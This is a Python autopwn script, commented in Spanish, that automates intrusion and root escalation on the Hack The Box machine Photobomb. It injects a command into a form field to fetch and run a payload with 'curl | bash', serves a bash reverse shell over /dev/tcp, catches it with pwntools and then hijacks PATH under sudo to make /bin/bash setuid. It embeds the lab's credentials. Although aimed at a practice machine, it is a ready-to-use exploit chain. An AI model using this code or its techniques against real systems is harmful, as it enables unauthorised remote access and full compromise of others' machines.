#!/usr/bin/python3

# Script que automatiza tanto la intrusión como la escalada para la máquina Photobomb de Hack The Box [06/02/2023]

import signal,sys,requests,threading,time,http.server,socketserver,os
from pwn import *

# Variables globales 
lhost=''
lport = ''

# Ctrl + C
def def_handler(sig,frame):
	print("[!] Saliendo...")
	sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def runHTTPServer():
    PORT = 8081
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("", PORT), Handler)
    httpd.serve_forever()

def indexcreate():
    f = open("index.html", "w")
    f.write(f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1")
    f.close()
    
def makeRequest():

	url = "http://photobomb.htb/printer"

	post_data = {
		"photo":"voicu-apostol-MWER49YaD-M-unsplash.jpg",
		"filetype":f"jpg;$(curl {lhost}:8081 | bash)",
		"dimensions":"3000x2000"
	}

	headers = {
		"Authorization": "Basic cEgwdDA6YjBNYiE="

	}

	requests.post(url, headers=headers, data=post_data)

	
if __name__ == '__main__':

	if len(sys.argv) < 3:
		print ("\nIntroduce tu IP local y puerto")

	else:
		lhost= sys.argv[1]
		lport = sys.argv[2] 
		p1 = log.progress("Photobomb autopwn to root user")
		p1.status("Obteniendo shell como wizard")
		time.sleep(2)

		indexcreate()
		
		try:
			threading.Thread(target=runHTTPServer, args=()).start()	

			try:
				threading.Thread(target=makeRequest, args=()).start()
			except Exception as e:
				log.error(str(e))

			shell = listen(lport, timeout=20).wait_for_connection()

			if shell.sock is None:
				p1.failure("Connection couldn't be stablished")
				sys.exit(1)

			else:
				p1.status("Shell gained as wizard")
				os.remove("index.html")
				sleep(2)
				p1.status("Pivoting to root")
				sleep(2)
				shell.sendline(b"echo 'chmod u+s /bin/bash' > /tmp/find")
				shell.sendline(b"chmod +x /tmp/find")
				shell.sendline(b"export PATH=/tmp:$PATH")
				shell.sendline(b"sudo PATH=$PATH /opt/cleanup.sh")
				shell.sendline(b"bash -p")
				sleep(2)
				shell.interactive()
	
		except Exception as e:
			log.error(str(e))
